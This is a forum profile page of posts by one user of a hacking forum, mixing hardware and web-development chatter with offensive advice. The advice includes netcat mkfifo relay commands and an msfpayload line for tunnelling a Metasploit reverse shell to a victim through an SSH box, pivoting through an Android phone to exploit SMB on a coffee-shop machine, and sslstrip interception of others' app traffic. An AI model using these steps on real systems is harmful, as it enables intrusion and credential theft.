i8igmac
-
Posts
939 -
Joined
-
Last visited
-
Days Won
22
Posts posted by i8igmac
-
-
I may have came across this. I was successful in getting a reverse shell threw a tunnel. Video above I accomplished exactly what you are trying to do.. BUT I tunneled the traffic threw my android phone. I had to explore other types of tunnels, made my own tunnel out of ruby sockets in this video but I found netcat is simplest!
Try something generic reverse shell... no staging or anything
-
also, the link u provide there is a update at the bottem of the page. A netcat example like the one I provide...
If your machines are talking to each other then it may just be a metasploit issue
-
try another payload. Without the stage.
there are 3 machines involved with your project?
Kali--->SSH-BOX<---victim? ?
Your ssh-box is the only machine that can port forward?
I suggest running small test. With netcat you can perform hi world examples
Also. The link u provide, scrole down and u will see a netcat example like mine...
-
$ mkfifo mypipe
$ nc -l 8082 0<mypipe | nc yahoo:com 80 1>mypipe
Your netcat syntax may be different. Here is what mine looks like nc - l -p 8082
this is a basic proxy. Now from another terminal connect to this port 8082 and paste in a proper yahoo get request.
If this is simple enough we can move on to a reverse_proxy
-
do u have access to netcat? Ruby python perl ?
u should check out mkfifo pips I can help with answer to my above question
-
did u have to boot up from live disk? For those that want to recover deleted files shut down the machine right Away!
a really nice tool I have used a few weeks ago, testdrive
Just open the location of the file you want to recover and you will see highlights in red.
-
Yeah.. I just moved an entire office off of IE over the weekend and so far a day has gone by with 0 complaints!
I love to see people use IE... here, dont click this link www.I8igmac.tk
-
I like cuda gpu cracking... so I went nvidia with cuda support...
I would look for a 6 core amd cpu... I spent 250 us dollars two years ago... you could find one around 100
I also paid for 60 gig ssd 2 years ago and now the price has gone way down...
You will love this setup
-
Get a big cheap shell coolermaster, mine allows easy access for the hard drives to slide in and out. Good fan locations
get a solid state drive, only big enough to install your os
I would get last years amd 6 core cpu. Good bang for the buck.
go big on your video card.
cheap on the basics...
-
Watch "metasploit_Reverse_proxy Android phone" on YouTube
metasploit_Reverse_proxy Android nonroot phone:
Ill try to explain the best I can... the video needs narration...
from a coffee shop holding my droid, ssh into backtrack desktop I have at home.
My droid phone starts a reverse ruby proxy on the desktop, my phone then established 2 connections...
One of those connections is a local windows machine at the coffee shop that has smb port open 135
The second connection is back to the ruby reverse proxy running on the backtrack desktop...
So now there is a tunnle where the backtrack desktop can send data as shown below
Backtrack->droidphone->coffee-shop-machine=smb:135->
Now from the droid that has ssh to backtrack , start up metasploit and configure a smb exploit with the proper ports... reverse shell is succesful!
All done with simple proxxy work, notice metasploit loads in 5 seconds! Nonroot droid
-
Your explanation on pixels was a big help. I know what to aim for now...
So. If I have a basic table 900x300px... can I place a transparent table of exact size directly over the first table? This second table will have 10 times the ammount of cells for precise clicking locations(hi world from cell x.y)
-
For a quick picture. This is not exact amount of butons...
I would like to overlay these buttons as semi Transparent
A image could be placed behind these buttons...
at first each button will be hello world by example..
any snippets come to mind that I could play with? Or maybe software?
I do appreciate your comments...
-
My learning's on MITM vs smart phones...
Depending on the users habits, facebook, banking, twitter... etc...
Does the user browse his facebook with the web browser (sslstrip is fantastic)
if the User browse his accounts with a specific application other then the browser then depending on that applications security... sslstrip wont work
(I only check facebook app)
There are other tools sslsniff and sslsplit
The facebook app blinks red ( alert warning ) at my attempts to fake the cert...
So. I would like to see some others run test and share what they find... test the popular apps and seewhat plain text you can gather...
-
So. At this point I'm drawing my home page on a chalkboard... the placement of each button will not be a easy task.
Just as example picture a checkers board has 64 square buttons in a digital world... for my game I need 150 buttons placed on the screen, square's and rectangles with no real pattern...
any idias to help simplify this task? Maybe a gui?
-
nvidia cuda gpu power
-
labtop with decent nvidia graphics card... my 560m gtx 13000 psk
I paid a buttload for mine... I'm surr u can find one at that price...
just blow out the dust and you will be surprised to see performance boost... "its alive"
-
checkers is just as example, i will have to check out some ruby web stuff... i figured that stats displayed will come from /users logged/game history/game moves/gold won/etc...
i could bypass the use of a database, instead i could use encrypted text files, this would be quicker for me... but im afriad this will be a mistake...
file_name_user_bob.stats
is_logged_in=true
stats=1234
gold=100
games played=50
etc=some otherstuff
if i could use ruby 100% of the time would be convenent but maybe a mistake? (im confertable with ruby) (php is possable) (mysql clueless)
-
just as example, lets say the idea is a checkers game you play with friends for gold...
php will take user input send this data to the game.ruby, the game will respond with resaults back to php and also log statistics to mysql.
mysql, i will need to fabricate a board to play on for activity logs (my brain hits a brick wall with mysql) i feel i must start with the database.
-
php, mysql, ruby (for a small game function)
-
I plan on devoting Lots of time on building a webserver. im looking for tips and advice...
i will first start with vurtualbox and a default install of ubuntu server edition (what os you recomend? anything already configured out of the box? i like deb)
My first step i feel is to make a home page as it will be the template for the rest of the way.
user registration, i have found some secure examples online
multiple device screen size friendly... any advice?
as a web dev what is your routine for starting a new site? do you use a framework?
-
I notice there's a lot to talk about SSLStrip.
just for example the droid application for facebook, has anyone had success on preventing ssl on droid applications?
-
Cooper has good advice
-
Iptables seem to be the solution. I would like to extend my knowledge on this subject.
I have installed ddwrt on a few routers... one feature is iptables...
Torrent block with iptables is simple. I would like to see some examples on giving torrent traffic a throttle or low priority
-
airodump in will show clients
Need some help, metasploit reverse_tcp over ssh tunnel
in Hacks & Mods
Posted · Edited by i8igmac
so. If this makes sense... what remember doing... on a droid at the moment...
To bypass the problem u experience with metasploit. I had to setup a proxy on the kali localhost that you would set LHOST/PORT to your multi/handler to localhost
Kali
Msfpayload reverse/payload set LPORT=1234 LHOST=ssh-box -x test.exe
Use multihandler
Set LHOST localhost
Set LPORT 4444
now start a netcat proxy with mkfifo to pass the payload to your ssh-box(impropersyntax)
Nc -l -p 4444 0< pipe | nc ssh-box 5555 1> pipe
Exploit
Now your ssh-box needs to accept this and pass it to the victim, notice 2 ports need forward
Ssh-box
Nc -l -p 5555 0< pipe | nc -l -p 1234 1> pipe
Now your victem executes the exe that connects back to ssh-box:1234... its a brain twister of ports and pipes. Wish i was at my puter for a proper example.